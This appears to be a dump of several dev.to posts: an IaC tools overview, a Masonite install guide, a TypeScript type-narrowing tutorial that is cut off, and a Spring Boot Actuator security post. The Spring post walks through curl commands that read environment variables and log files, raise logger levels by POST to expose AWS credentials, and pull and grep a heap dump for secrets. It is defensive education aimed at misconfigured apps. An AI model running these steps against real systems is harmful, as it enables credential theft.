The IaC tool requires no agents or custom security infrastructure, making it easy to deploy. Moreover, the tool’s code is written in the very simple YAML language in the form of Ansible Playbooks, allowing users to describe their automation jobs in an easy manner. Users can also expand the features of the Ansible tool by writing custom Ansible modules and plugins.
**Chef**
Chef is another top IaC tool used by DevOps engineers to develop and deploy secure and scalable infrastructure automation across multi-OS, multi-cloud, on-prem, hybrid, and complex legacy architectures. This configuration management tool leverages open source community-based software development and enterprise-class support.
The Chef IaC tool uses a Ruby-based DSL to create ‘recipes’ and ‘cookbooks’, which contain step-by-step instructions for achieving the desired configuration state for applications on an existing server. The tool is cloud-agnostic and is compatible with major clouds such as AWS, Azure, and Google Cloud. Some of the use cases of the Chef tool are consistent configuration, system hardening, hybrid cloud control, automated remediation, and continuous delivery pipeline automation.
**Puppet**
Puppet has garnered a spot in the top 10 IaC tools for the scalable approach it brings to infrastructure automation. Since 2005, Puppet’s Infrastructure as Code has helped over 40,000 organizations, including 80% of the Global 5000, to simplify the complexity of their IT infrastructure and fortify their security posture, compliance standards, and business resiliency.
Puppet IaC tool is written in Ruby-based DSL and uses a declarative approach to manage configuration on Unix and Windows operating systems. It integrates with all the leading cloud platforms such as AWS, Azure, Google Cloud, and VMware, enabling multiple cloud automation. Puppet is available in both open-source and enterprise versions.
**SaltStack**
Offered by VMware, SaltStack is an open-source configuration management tool based on Python. It is an easy-to-use IaC tool for provisioning, deploying, and configuring infrastructure on any platform at high speed. The key selling point of this IaC tool is its remote execution engine, which creates a high-speed, bi-directional communication network for groups of systems. It even comes with SSH support that offers an agentless mode. Moreover, the tool has a scheduler that lets you define how often the managed servers should run your code.
The SaltStack tool enables businesses to create simple, human-readable infrastructure-as-code to provision and configure systems and software across virtualized, hybrid, and public cloud environments. You can manage and secure your infrastructure with powerful automation and orchestration. With the Salt event-driven automation engine, one can define the state of a system and auto-remediate as soon as a drift occurs.
**AWS CloudFormation**
CloudFormation is an Infrastructure as Code tool that is deeply integrated into the AWS cloud. It enables users to model, provision, and manage infrastructure and resources across all AWS accounts and regions through a single operation. One can easily code their infrastructure from scratch with the CloudFormation templates language, which is in either YAML or JSON format.
CloudFormation empowers users to easily automate, test, and deploy infrastructure templates with DevOps, and CI/CD automation. Moreover, with this IaC tool, teams can run anything from a single Amazon Elastic Compute Cloud (EC2) instance to a complex multi-region application. The last piece of the puzzle is the AWS Free Tier which offers 1000 handler operations per month per account.
**Google Cloud Deployment Manager**
As the name suggests, Google Cloud Deployment Manager is an infrastructure deployment tool offered by Google Cloud. It automates the creation, configuration, provisioning, and management of resources on the Google Cloud Platform. This IaC tool enables users to specify all the resources needed for their application in a declarative format using YAML. Python or Jinja2 templates can also be used to specify the configuration. Moreover, it allows the reuse of common deployment paradigms such as load-balanced, auto-scaled instance groups.
With this popular IaC tool, teams can write flexible templates and configuration files for creating deployments that include a host of Google Cloud services, such as Compute Engine, Cloud Storage, and Cloud SQL.
**Azure Resource Manager (ARM)**
Microsoft has gone the extra mile to meet the evolving needs of its massive Azure customer base by introducing Azure Resource Manager, an infrastructure deployment and management service. This Azure-specific IaC tool provides a management layer that allows users to create, update, and delete resources in their Azure account. It also offers management features, including access control, locks, and tags, to efficiently secure and organize resources after deployment. The tool also comes with Role-Based Access Control (RBAC), enabling users to control access to all the resources within a resource group.
With an ARM, teams can quickly redeploy their infrastructure several times throughout the application development lifecycle, while maintaining consistency in the state. Moreover, they can manage their infrastructure through declarative templates instead of scripts.
**Vagrant**
Developed by HashiCorp, the creator of Terraform, Vagrant is an IaC tool preferred by professionals managing a small number of virtual machines rather than large cloud infrastructures.
Vagrant enables teams to build and manage VM environments in a single workflow. The easy-to-configure, reproducible, and portable work environments, controlled by a single consistent workflow, reduce development environment setup time and maximize productivity and flexibility.
Vagrant is compatible with VirtualBox, VMware, AWS, and other cloud service platforms and can integrate with provisioning tools such as shell scripts, Chef, and Puppet.
**Pulumi**
Though it is a newer IaC tool on the market, Pulumi earned a spot on this list of best IaC tools because of its more modern approach to coding. In contrast to other IaC tools that use Python, YAML, JSON, or Ruby, Pulumi lets you write instructions in general-purpose programming languages such as TypeScript, JavaScript, Python, Go, and C#. This makes Pulumi a genuine infrastructure-as-code tool. It is available in open-source and enterprise versions.
## How To Choose the Right IaC Tool for Your Organization
Apart from the above-listed top 10 IaC tools, many other IaC tools have been gaining ground in the market recently. With so many options available, choosing an infrastructure-as-code tool is a tough decision that requires thought, research, and a comparison of the pros and cons of the various tools. So it's imperative to take the time to go through the available options and find the tool that best meets your unique business needs.
Once an IaC tool is selected, ensure that your team automates not only the infrastructure but also the delivery process with a robust Continuous Integration and Continuous Delivery (CI/CD) tool.
However…
**In Reality, There Is No One-size-Fits-all IaC Tool**
Though you can choose an infrastructure-as-code tool that best suits your business requirements, relying on that one IaC tool alone is unwise, because there is no one-size-fits-all IaC tool that can fully cover all your infrastructure needs in this ever-evolving IT world. So, to be future-ready and stay ahead of dynamic infrastructure needs, businesses should rely on a set of IaC tools rather than a single tool. But there's a catch!
Businesses must orchestrate their chosen IaC tools to simplify and streamline the infrastructure workflow and manage the tools efficiently. Without orchestrating these tools, the business may end up mired in infrastructure-management complexity. | vishnube |
1,233,648 | Learning blog-27 | A post by HONGJU KIM | 0 | 2022-10-28T10:15:55 | https://dev.to/hongju_kim_821dc285a52c96/learning-blog-27-2a2n |

| hongju_kim_821dc285a52c96 | |
1,233,919 | Search custom form with post request datatable | Hello everyone can i search with post request in data-tables? backend -> django frontend ->... | 0 | 2022-10-28T12:24:10 | https://dev.to/syedkashifnaqvi/search-custom-form-with-post-request-datatable-8nn | datatable | Hello everyone can i search with post request in data-tables?
backend -> django
frontend -> html/css jquery
Please guide me. I see no option in DataTables for POST searching; if you know of any way, please let me know.
| syedkashifnaqvi |
1,234,000 | How to install Masonite On Windows | The Masonite Framework is a modern and developer-centric Python web framework. This framework works... | 0 | 2022-10-28T15:27:35 | https://dev.to/dilantsasi/how-to-install-masonite-on-windows-2llj | python, masonite, webdev, tutorial | The [Masonite](https://masoniteproject.com/) Framework is a modern and developer-centric Python web framework. This framework works hard to be fast and easy from installation to deployment so developers can go from concept to creation as quickly and efficiently as possible.
In this tutorial, I will show you how to install Masonite 3.0 and set up a Masonite project on a Windows computer.
This tutorial assumes that you understand the basics of Python and pip commands.
## Requirements
1. Python 3.6+
2. The latest version of OpenSSL
3. Pip3
## How to install masonite
The first thing to do is to open your command prompt and navigate to the directory where you want to get it installed.
```
cd c:\my\masonite\directory
```
Once in this folder, create a new folder for your Masonite project and change into it.
```
mkdir my_app
cd my_app
```
One optional step is activating a virtual environment. You can use a virtual environment if you don't want to install all of Masonite's dependencies into your system's Python.
```
python -m venv venv
.\venv\Scripts\activate
```
## Installing Masonite
Now we can install Masonite using pip. This will give us access to Masonite's `craft` command-line tool, which we can use to finish the installation steps for us. You can do so by running:
```
pip install masonite
```
Once Masonite installs you will now have access to the `craft` command-line tool. The craft command will become your best friend during your development.
You can ensure Masonite and craft are installed correctly by running:
```
craft
```
You should see a list of a few commands like `install` and `new`.

## Creating Our Project

From the commands you saw above, we will be using the `new` command to create our project. To create a new project, just run:
```
craft new
```
This will also run `craft install` which will install our dependencies.
This will get the latest Masonite project template and unzip it for you. We need to go into our new project directory and install the dependencies in our `requirements.txt` file
Now that Masonite has been successfully installed, there will be more commands available in the craft. You can check it out by running
```
craft
```
## Running The Server
Our setup is complete; all that is left is to run our server and view our new Masonite-powered website in the browser. We do that by running:
```
craft serve
```
The command will prepare everything for us and provide an address we can use to view our new website in the browser.
> **Note!**
> When copying the address from the command prompt, do not press `CTRL + C`, as it will stop the server that is currently running. Instead, highlight the address, right-click, and copy it.

That is it. You have set up your first website with Masonite. Feel free to add your comments for further discussion.
| dilantsasi |
1,234,486 | Spring Actuator - Stealing Secrets Using Spring Actuators - Part 1: | Spring is a set of frameworks for developing Applications in Java. It is widely used, and so it is... | 20,295 | 2022-10-28T20:19:00 | https://tutorialboy24.blogspot.com/2022/09/spring-actuator-stealing-secrets-using.html | cybersecurity, infosec, springboot, informationsecurity | [Spring](https://spring.io/) is a set of frameworks for developing Applications in Java. It is widely used, and so it is not unusual to encounter it during a security audit or penetration test. One of its features that I recently encountered during a Whitebox audit is actuators. In this series of articles, I will use them as a case study for security testing - first describing the risk involved in exposing actuators to the Internet by demonstrating how they can be used to steal secrets from your applications, using a basic Spring application as a case study. In the next parts of the series, I will discuss how to detect misconfiguration using static code analysis and dynamic testing, and finally, how you can secure those actuators that you absolutely cannot leave turned off.
## What are Actuators?
[Actuators](https://docs.spring.io/spring-boot/docs/2.5.6/reference/html/actuator.html) expose information about the running Spring application via (amongst others) a REST API and can be used to retrieve data from the system, or even make configuration changes if configured (in)correctly. They can be quite helpful in debugging or monitoring a Spring application, but if you expose them too widely, things can get dangerous very quickly.
By default, [only the health check endpoint is enabled over REST](https://docs.spring.io/spring-boot/docs/2.5.6/reference/html/actuator.html#actuator.endpoints.exposing), listening at /actuator/health. However, it is possible to enable additional endpoints, for example, to expose metrics to Prometheus for monitoring. This can be done through settings in the relevant .properties file (or its YAML equivalent):
```properties
# Enable Prometheus endpoint in addition to health check
management.endpoints.web.exposure.include=health,prometheus
```

It is also possible to enable all endpoints for access over REST, by using the following setting in the relevant .properties file:
```properties
# Do not do this! This is insecure!
management.endpoints.web.exposure.include=*
```

This is the config that I found during a recent engagement - and since the application was explicitly configured to expose all actuators without any authentication, I was curious to see what other actuators exist, and how they could be leveraged to attack the application. The result was this article series (and a call to the customer, telling them to make some changes to their configuration right now).
## Exploiting Public Actuators
Conveniently, Spring provides a [list of all actuators](https://docs.spring.io/spring-boot/docs/2.5.6/reference/html/actuator.html#actuator.endpoints) that are present by default and can be enabled. They include actuators for reading (and writing!) the log configuration, the application environment (including environment variables), and even the logs of the application. Even more conveniently, by default it will show you the list of enabled actuators if you simply access /actuator, taking the guesswork out of determining which actuators you have to work with.
I've created a [basic, vulnerable Spring application ](https://github.com/malexmave/blog-spring-actuator-example)that exposes all endpoints if you want to follow along at home. Running it locally on your machine and accessing the Spring actuators endpoint, you will get the following output:
```
$ curl localhost:8081/actuator | jq .
{
  "_links": {
    "self": {
      "href": "http://localhost:8081/actuator",
      "templated": false
    },
    "beans": {
      "href": "http://localhost:8081/actuator/beans",
      "templated": false
    },
    "caches": {
      "href": "http://localhost:8081/actuator/caches",
      "templated": false
    },
    "caches-cache": {
      "href": "http://localhost:8081/actuator/caches/{cache}",
      "templated": true
    },
    "health-path": {
      "href": "http://localhost:8081/actuator/health/{*path}",
      "templated": true
    },
    "health": {
      "href": "http://localhost:8081/actuator/health",
      "templated": false
    },
    "info": {
      "href": "http://localhost:8081/actuator/info",
      "templated": false
    },
    "conditions": {
      "href": "http://localhost:8081/actuator/conditions",
      "templated": false
    },
    "configprops": {
      "href": "http://localhost:8081/actuator/configprops",
      "templated": false
    },
    "configprops-prefix": {
      "href": "http://localhost:8081/actuator/configprops/{prefix}",
      "templated": true
    },
    "env-toMatch": {
      "href": "http://localhost:8081/actuator/env/{toMatch}",
      "templated": true
    },
    "env": {
      "href": "http://localhost:8081/actuator/env",
      "templated": false
    },
    "logfile": {
      "href": "http://localhost:8081/actuator/logfile",
      "templated": false
    },
    "loggers-name": {
      "href": "http://localhost:8081/actuator/loggers/{name}",
      "templated": true
    },
    "loggers": {
      "href": "http://localhost:8081/actuator/loggers",
      "templated": false
    },
    "heapdump": {
      "href": "http://localhost:8081/actuator/heapdump",
      "templated": false
    },
    "threaddump": {
      "href": "http://localhost:8081/actuator/threaddump",
      "templated": false
    },
    "metrics-requiredMetricName": {
      "href": "http://localhost:8081/actuator/metrics/{requiredMetricName}",
      "templated": true
    },
    "metrics": {
      "href": "http://localhost:8081/actuator/metrics",
      "templated": false
    },
    "scheduledtasks": {
      "href": "http://localhost:8081/actuator/scheduledtasks",
      "templated": false
    },
    "mappings": {
      "href": "http://localhost:8081/actuator/mappings",
      "templated": false
    }
  }
}
```
There have been some articles about exploiting actuators, which can even lead to remote code execution (RCE) on the machine running the application. [Veracode discussed a series of paths to RCE in 2019](https://www.veracode.com/blog/research/exploiting-spring-boot-actuators) (although some of their methods no longer work on modern Spring versions). In this article, I wanted to highlight a few additional endpoints that can prove dangerous, to illustrate why you should be careful with this feature.
## Exposing the Environment
Let's assume the application you are running is using environmental variables to pull in configuration values:
```java
public class SecretConfig {
    protected static String DATABASE_CONNECTION = System.getenv("DB_CONN");
    protected static String SECRET_AWS_ACCESS_KEY = System.getenv("AWS_SECRET_KEY");
    protected static String SECRET_AWS_ACCESS_TOKEN = System.getenv("AWS_TOKEN");
}
```
One of the endpoints allows us to take a peek at the application environment. Let's see if we can get these tokens using the env actuator:
```
$ curl localhost:8081/actuator/env | jq .
// ... lots of stuff
"DB_CONN": {
  "value": "psql://server/db",
  "origin": "System Environment Property \"DB_CONN\""
},
// ... lots of stuff
```

So, we can read the DB connection string in plaintext from the actuator. Sweet. What about the AWS credentials? Well, the situation is a bit more complicated here:

```
"AWS_SECRET_KEY": {
  "value": "******",
  "origin": "System Environment Property \"AWS_SECRET_KEY\""
},
"AWS_TOKEN": {
  "value": "******",
  "origin": "System Environment Property \"AWS_TOKEN\""
},
```
As you can see, the data is being redacted. Spring automatically tries to redact sensitive values in the Actuator output, based on the name of the environment variable. If we had been more careless and chosen a different name, the data would be right here for the taking, but sadly, Spring has prevented us from trivially stealing the values here. But, there are of course other ways to achieve this goal.
## Reading Logs
Let's assume that your application has the following code:
```java
@RequestMapping("/")
public String index() {
    logger.info("Entering hello world function...");
    String AWS_KEY = SecretConfig.SECRET_AWS_ACCESS_KEY;
    String AWS_TOKEN = SecretConfig.SECRET_AWS_ACCESS_TOKEN;
    // Log the AWS credentials for debugging,
    // so we know if they got loaded correctly.
    logger.info("Dumping AWS credentials for debugging purposes: Key: {} Token: {}", AWS_KEY, AWS_TOKEN);
    // Do some work with the AWS credentials
    return "Hello World!";
}
```
Assuming it is configured to log to a file, Spring helpfully exposes an endpoint called /actuator/logfile. Let's take a look at what this can give us:
```
$ curl localhost:8081/actuator/logfile
[...]
2022-08-24 13:45:14.813 INFO 68465 --- [http-nio-8081-exec-2] com.example.demo.DemoApplication : Entering hello world function...
2022-08-24 13:45:14.814 INFO 68465 --- [http-nio-8081-exec-2] com.example.demo.DemoApplication : Dumping AWS credentials for debugging purposes: Key: AKIATESTTEST Token: TESTingSecretAccessTest
```
And there we go - we can pull the AWS credentials right from the logs.
This is, admittedly, a bit far-fetched. No one in their right mind would log AWS credentials in a production environment, right? Okay, then let's make a few changes to the code to reflect this:
```java
@RequestMapping("/")
public String index() {
    logger.info("Entering hello world function...");
    String AWS_KEY = SecretConfig.SECRET_AWS_ACCESS_KEY;
    String AWS_TOKEN = SecretConfig.SECRET_AWS_ACCESS_TOKEN;
    // This is safe, as this logs on the DEBUG level,
    // while in production, the loglevel is set to INFO,
    // so this will never be logged
    logger.debug("Dumping AWS credentials for debugging purposes: Key: {} Token: {}", AWS_KEY, AWS_TOKEN);
    // Do some work with the AWS credentials
    return "Hello World!";
}
```
So you build, deploy, double-check that the logs are clean, and go to bed, knowing that your application is now safe - right?
## Changing Log Configuration
Enter /actuator/loggers. This endpoint gives us the log configuration for the application, and looks something like this:
```
$ curl localhost:8081/actuator/loggers | jq .
{
  "levels": [
    "OFF",
    "ERROR",
    "WARN",
    "INFO",
    "DEBUG",
    "TRACE"
  ],
  "loggers": {
    // ...
    "com.example.demo": {
      "configuredLevel": null,
      "effectiveLevel": "INFO"
    },
    "com.example.demo.DemoApplication": {
      "configuredLevel": null,
      "effectiveLevel": "INFO"
    },
    // ...
  }
  // ...
}
```
So, we can see that the logger is configured to only log on the INFO level. Sure, this isn't great (the endpoint discloses a lot about the structure of the application, used dependencies, etc.), but it isn't immediately dangerous. What is dangerous is the fact that the logger configuration can also be changed through this actuator by sending a POST request to the corresponding endpoint. In this case, I am setting the log level for the logger `com.example.demo.DemoApplication` to DEBUG:
```
$ curl -X POST localhost:8081/actuator/loggers/com.example.demo.DemoApplication -H 'Content-Type: application/json' -d '{"configuredLevel": "DEBUG"}'
```
Visit the page again, retrieve the logs - and there we go:
```
$ curl localhost:8081/actuator/logfile
[...]
2022-09-24 13:57:37.774 INFO 71087 --- [http-nio-8081-exec-2] com.example.demo.DemoApplication : Entering hello world function...
2022-09-24 13:57:37.774 DEBUG 71087 --- [http-nio-8081-exec-2] com.example.demo.DemoApplication : Dumping AWS credentials for debugging purposes: Key: AKIATESTTEST Token: TESTingSecretAccessTest
```
The logs are back, clearly showing that the application is now logging on the DEBUG level. Now you are seriously annoyed, and decide to do what you should have done before: get rid of the logging statement, as there really is no good reason for it to be there in the first place anyway.
```java
@RequestMapping("/")
public String index() {
    logger.info("Entering hello world function...");
    String AWS_KEY = SecretConfig.SECRET_AWS_ACCESS_KEY;
    String AWS_TOKEN = SecretConfig.SECRET_AWS_ACCESS_TOKEN;
    // Do not log the AWS Credentials, this is dangerous!
    // => Commented out for now.
    // logger.debug("Dumping AWS credentials for debugging purposes: Key: {} Token: {}", AWS_KEY, AWS_TOKEN);
    // Do some work with the AWS credentials
    return "Hello World!";
}
```
Build, deploy, and finally we're safe. Right?
## Actually, I'll Just Have Everything To Go, Please
Pulling data from logs is a really tedious task, and there is no guarantee for me (as an attacker) that the application will actually log interesting things. Sure, I could go ahead and set every single external library to the TRACE log level, collect the logs, and sift through them, but really, this seems like a lot of work I'd rather avoid doing, thank you very much. Why go to that trouble if I could instead just take... everything?
Well, lucky for me, there is /actuator/heapdump. This endpoint does exactly what it sounds like - it takes a copy of the Java heap (i.e., the memory of the application) and provides it to me as a large blob of binary data. Let's grab a copy and dig in.
```
$ curl localhost:8081/actuator/heapdump -o heap.bin
```
Now, since you have cleverly disabled the logging of AWS credentials, I can no longer just read them from the logs - but they are still in the heap of the application! Likely in the middle of a big chunk of meaningless binary data, but that's what the `strings` utility is for - it pulls sequences of printable characters from any file and presents them to you, newline-separated. You can then pipe the whole thing through `grep` to find what you are looking for. For example, AWS credentials.
```
# Use -C 20 to see 20 lines before and after each match
$ strings heap.bin | grep -C 20 AKIA
[...]
AWS_TOKEN#
AWS_TOKEN!
TESTingSecretAccessTest#
TESTingSecretAccessTest!
[...]
AWS_SECRET_KEY#
AWS_SECRET_KEY!
AKIATESTTEST#
AKIATESTTEST!
```
And there we go - secrets, pulled directly from the brain of your application. In the same way, we could pull out cryptographic keys, API credentials, user data that the application is currently working on, internal API addresses, AWS resource identifiers, or whatever else the application is using. And at this point, there really isn't anything you can do about it.
Well, except, of course, not exposing your actuators.
## Closing Notes
I've only gone through a small number of the actuators in this blog post, and these aren't even necessarily [the most dangerous ones](https://www.veracode.com/blog/research/exploiting-spring-boot-actuators). The only arguably harmless endpoint is the health check actuator (which is also the only one that is enabled by default). Any other endpoint should be considered dangerous (yes, even the Prometheus endpoint you are using for monitoring your application, unless you are fine with showing the whole world your resource usage and whatever business metrics you are exposing through it). The best thing you can do is to turn off every endpoint you are not actively using, limit access to the others using a firewall, and add authentication requirements.
In the next parts of this blog series, I will discuss how to detect your exposed endpoints. We will begin with detecting them in your code, and then move on to detecting them with dynamic security scanners. Finally, we will discuss how you can secure your actuators against attackers.
## Further reading:
- [The spring actuator documentation](https://docs.spring.io/spring-boot/docs/current/reference/html/production-ready-features.html)
- [Introduction to Spring Boot Related Vulnerabilities](https://tutorialboy24.blogspot.com/2022/02/introduction-to-spring-boot-related.html)
- [Veracode listing options for RCE using Spring Actuators](https://www.veracode.com/blog/research/exploiting-spring-boot-actuators)
- [A Study Notes of Exploit Spring Boot Actuator](https://tutorialboy24.blogspot.com/2022/02/a-study-notes-of-exploit-spring-boot.html)
| tutorialboy |
1,234,487 | Type-Safe TypeScript with Type Narrowing | 1. Introduction 2. Equality Narrowing 3. typeof 4. Truthiness Narrowing 5. instanceof 6.... | 0 | 2022-10-28T19:27:51 | https://www.rainerhahnekamp.com/en/type-safe-typescript-with-type-narrowing/ | typescript, javascript, webdev | - [1. Introduction](#1-introduction)
- [2. Equality Narrowing](#2-equality-narrowing)
- [3. `typeof`](#3-typeof)
- [4. Truthiness Narrowing](#4-truthiness-narrowing)
- [5. `instanceof`](#5-instanceof)
- [6. Discriminated Union](#6-discriminated-union)
- [7. `in` Type Guard](#7-in-type-guard)
- [8. Type Predicate](#8-type-predicate)
- [9. Type Narrowing against `unknown`](#9-type-narrowing-against-unknown)
- [9.1. Manual Validation](#91-manual-validation)
- [9.2. Automatic Validation: zod](#92-automatic-validation-zod)
- [10. Assertion Functions](#10-assertion-functions)
- [11. Summary](#11-summary)
This article shows common patterns to maximize TypeScript's potential for type-safe code. These techniques are all part of the same group, which we call type narrowing.
The source code can be found on: https://github.com/rainerhahnekamp/type-safe-typescript-with-type-narrowing
If you prefer a video over an article, then this is for you:
{% embed https://youtu.be/MUJBT3Pb_Eg %}
## 1. Introduction
Whenever we deal with a variable that can be of multiple types, like an `unknown` or a union type, we can apply type narrowing, to "narrow" it down to one specific type. We work together with the TypeScript compiler because it understands the context of our code and guarantees that this narrowing happens in a fully type-safe way.
Let's say we have a function with a parameter of type `Date | undefined`. Every time the function executes, the variable's type can either be `Date` or `undefined`, but not both types at the same time.
```typescript
function print(value: Date | undefined): void {}
```
If we apply an `if` condition, checking if that variable is not `undefined`, TypeScript understands its meaning and treats the value inside the condition only as a `Date`. This is type narrowing.
```typescript
function print(input: Date | undefined): void {
  if (input !== undefined) {
    input.getTime(); // 👍 input is only Date
  }
  input.getTime(); // 💣 fails because input can be Date or undefined
}
```
There is also a very similar technique which is called type assertion. It looks like the easier option at first sight. In terms of type-safety though, it is not. We manually set the type and therefore overwrite the compiler.
If the compiler could speak to us, it would say something like: "OK, you know what you are doing there, but don't blame me if something goes wrong."
Therefore we should avoid type assertion and always favour type narrowing. (And in general: trying to be smarter than the compiler is never a good idea.)
```typescript
function print(input: Date | undefined): void {
(input as Date).getTime(); // type assertion - don't!
}
```
After this short introduction, let's come up with an example where we see the major type narrowing techniques in action.
This will be our "workbench":
```typescript
declare function diffInYears(input: Date): number;
declare function parse(input: string): Date;
function calcAge(input: Date | null | undefined): number {
return diffInYears(input); // will not work
}
```
`calcAge`, should return - as the name says - the age.
Additionally, we use the two utility functions `diffInYears` and `parse`. For simplicity, the snippet doesn't show their implementation.
The type of `input` in `calcAge` can be of three different types. The return statement will therefore fail to compile.
## 2. Equality Narrowing
An obvious start would be to check if `input` doesn't have the value `null` and `undefined`. If that's the case, then it can only be a `Date`.
If we add this condition, TypeScript understands it and treats `input` inside the `if`-block as `Date` and we can safely call `diffInYears`.
This "implicit understanding" of TypeScript is already our first type guard and it is called "Equality Narrowing".
```typescript
function calcAge(input: Date | null | undefined): number {
if (input !== null && input !== undefined) {
return diffInYears(input);
}
}
```
Please be aware that the `if` condition is not a direct check against the types `undefined` or `null`; it runs against their values. In the same way, we would not be able to write a type check against a `Date` as `value === Date`: `Date` is the type of `input`, not its value.
So why can we use `undefined` and `null` then? The answer is quite obvious. The type `undefined` has just one value, which is 'undefined'. And the same is true for `null`. The type `null` can only have one value, and that is 'null'.
So what our condition really does is exclude all of the possible values that `undefined` or `null` can hold. For obvious reasons, we don't want to exclude all possible values of type `Date` :)
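A related shortcut, not used in the article's code, so treat it as an aside: because `null` and `undefined` are the only two values that are loosely equal to `null`, a single `!= null` check narrows both away at once. Below is a minimal self-contained sketch, with a simplified inline year difference standing in for the article's `diffInYears`:

```typescript
function calcAge(input: Date | null | undefined): number {
  // Loose inequality against null is true only when input is neither
  // null nor undefined, so TypeScript narrows input to Date in here
  if (input != null) {
    return new Date().getFullYear() - input.getFullYear();
  }
  return 0;
}

console.log(calcAge(new Date(2000, 0, 1))); // a positive number of years
console.log(calcAge(null)); // 0
```

Both narrowing styles are equivalent in type-safety here; `!= null` is simply more compact.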
## 3. `typeof`
Let's try another type guard. JavaScript provides `typeof`, which we can place in front of any variable. As the name says, it returns the name of the variable's type as a `string`… well, not really. Otherwise, we would have already reached the end of this article :).
In JavaScript, we have seven primitive types and the rest is just of type `object`. The primitive types are `boolean`, `string`, `number`, `undefined`, `null`, `bigint`, and `symbol`.
`typeof` returns the name of every primitive type, except for `null`. For `null` it returns 'object'. So one could assume that for `null` and any non-primitive type, we would get 'object'. But there is a second exception: `typeof` also returns 'function' if the variable is a `function` or if you pass the name of a `class`. Strictly speaking, 'function' is not a real type; a function is a callable object.
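These exceptions are easy to verify at runtime. A small self-contained sketch:

```typescript
// typeof returns the primitive type name for most primitives;
// null and functions are the two famous exceptions
const results = [
  typeof "hi",       // "string"
  typeof 42,         // "number"
  typeof undefined,  // "undefined"
  typeof null,       // "object" - the historical exception
  typeof new Date(), // "object" - like any non-primitive value
  typeof (() => {}), // "function" - callable objects
];
console.log(results.join(", "));
```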
With that knowledge, would the following code work?
```typescript
function calcAge(input: Date | null | undefined): number {
if (typeof input === "object") {
return diffInYears(input);
}
}
```
No. Since `typeof` returns for `null` also 'object' the compilation will fail. So for now, we don't have any use for the `typeof` type guard, but let's keep it in mind. We might need it later.
## 4. Truthiness Narrowing
JavaScript invented two new English terms. Falsy and Truthy. If we put a falsy value into a condition, it will return `false` and `true` for a truthy value. There is an exhaustive list of falsy values in JavaScript. They are `false`, `0`, `0n`, `''`, `null`, `NaN`, and `undefined`.
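The list can be double-checked with a quick self-contained sketch (the falsy value `0n` is omitted here only because BigInt literals require an ES2020 compile target):

```typescript
// Each of these coerces to false in a boolean context
const falsyValues: unknown[] = [false, 0, "", null, NaN, undefined];
const allFalsy = falsyValues.every((v) => !v);

// Perhaps surprisingly, these are all truthy - including "0",
// a blank string with a space, and empty objects and arrays
const truthyValues: unknown[] = ["0", " ", {}, [], new Date(0)];
const allTruthy = truthyValues.every((v) => Boolean(v));

console.log(allFalsy, allTruthy); // true true
```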
We could use that to our advantage. If we put just `input` into the `if` condition, it will be `true` if the value is not `undefined` or `null`. In our case, this is very similar to the equality narrowing from before, just shorter.
```typescript
function calcAge(input: Date | null | undefined): number {
if (input) {
return diffInYears(input);
}
}
```
We missed one tiny bit here. If the value were an empty string, it would also be falsy and we would not end up inside the `if` condition. But that's OK for our use case, as long as we are aware of it.
Let's make our example more interesting. We add a fourth possible type which is a `string`. This is now the time where the `typeof` enters the game.
First, we get rid of the possibility that the value is `null` or `undefined` via truthiness narrowing and return the value 0 (we'll improve that later).
Then it is only between `Date` and `string`. And here we can use `typeof` to check if `input` is a `string`. If not, it can only be `Date`. Perfect!
```typescript
function calcAge(input: Date | null | undefined | string): number {
if (!input) {
return 0;
} else if (typeof input === "string") {
return diffInYears(parse(input));
} else {
return diffInYears(input);
}
}
```
## 5. `instanceof`
There is also a possibility for type narrowing when we deal with classes. For that purpose, let's add a class `Person`, which has a property `birthday` of type `Date`.
```typescript
class Person {
birthday = new Date();
}
function calcAge(input: Date | null | undefined | string | Person): number {
if (!input) {
return 0;
} else if (typeof input === "string") {
return diffInYears(parse(input));
} else {
return diffInYears(input); // failure: can be Date or Person
}
}
```
Obviously, the last return in the `else` clause will fail because `input` can be of type `Date` or `Person`. The good news, though, is that both are class instances, so we can use `instanceof`.
`instanceof` returns `true` if a value is an instance of a particular class. So if we add a condition with a check for class `Date`, we are on the type-safe side again:
```typescript
function calcAge(input: Date | null | undefined | string | Person): number {
if (!input) {
return 0;
} else if (typeof input === "string") {
return diffInYears(parse(input));
} else if (input instanceof Date) {
return diffInYears(input);
} else {
return diffInYears(input.birthday);
}
}
```
Be aware that `instanceof` returns `true` for the whole class inheritance chain. So if `Person` extended a class `Entity`, `instanceof Entity` would also return `true`.
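A minimal sketch of that behaviour (the `Entity` base class here is hypothetical, added only for this illustration):

```typescript
class Entity {}

class Person extends Entity {
  birthday = new Date();
}

const p = new Person();
console.log(p instanceof Person); // true
console.log(p instanceof Entity); // true: matches the whole inheritance chain
console.log(p instanceof Date);   // false
```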
## 6. Discriminated Union
We use classes quite often, but more often we deal with object literals or - put in TypeScript jargon - interfaces or types.
Check out the slightly modified example:
```typescript
type Person = {
birthday: Date;
category: "person";
};
type Car = {
yearOfConstruction: Date;
category: "car";
};
function calcAge(
input: Date | null | undefined | string | Person | Car
): number {
if (!input) {
return 0;
} else if (typeof input === "string") {
return diffInYears(parse(input));
} else if (input instanceof Date) {
return diffInYears(input);
} else {
return diffInYears(input.birthday); // Person | Car
}
}
```
Ouch, again a compilation error. Can't we just use `instanceof` here as well? No. `Person` and `Car` are each only a `type`, a construct that exists only in TypeScript. When the code is transpiled to JavaScript, the definitions of `Person` and `Car` are gone. Classes, on the other hand, do exist in JavaScript as well. That's why `instanceof` works for them.
Okay, so what can we do?
We are in a lucky position here. `Person` and `Car` both share the property `category`, and each has a distinct literal value. By verifying that `category` has the value "car", TypeScript is smart enough to understand that the type can only be `Car`; for `Person`, the value would obviously be "person". The name of this type guard is "discriminated union". Let's fix our code again:
```typescript
function calcAge(
input: Date | null | undefined | string | Person | Car
): number {
if (!input) {
return 0;
} else if (typeof input === "string") {
return diffInYears(parse(input));
} else if (input instanceof Date) {
return diffInYears(input);
  } else if (input.category === "car") {
return diffInYears(input.yearOfConstruction);
} else {
return diffInYears(input.birthday);
}
}
```
We are not required to name the discriminator property `category`; we can pick whatever name we want.
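For example, the widely used convention `kind` works just as well (the `Circle`/`Square` types below are hypothetical and not part of the article's running example):

```typescript
type Circle = { kind: "circle"; radius: number };
type Square = { kind: "square"; side: number };

function area(shape: Circle | Square): number {
  // Checking the discriminator narrows the union, whatever its name is:
  return shape.kind === "circle"
    ? Math.PI * shape.radius ** 2
    : shape.side ** 2;
}

console.log(area({ kind: "square", side: 3 })); // 9
```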
## 7. `in` Type Guard
Consider the case where we are not so lucky to have a property that we can use as a discriminator value:
```typescript
type Person = {
birthday: Date;
};
type Car = {
yearOfConstruction: Date;
};
function calcAge(
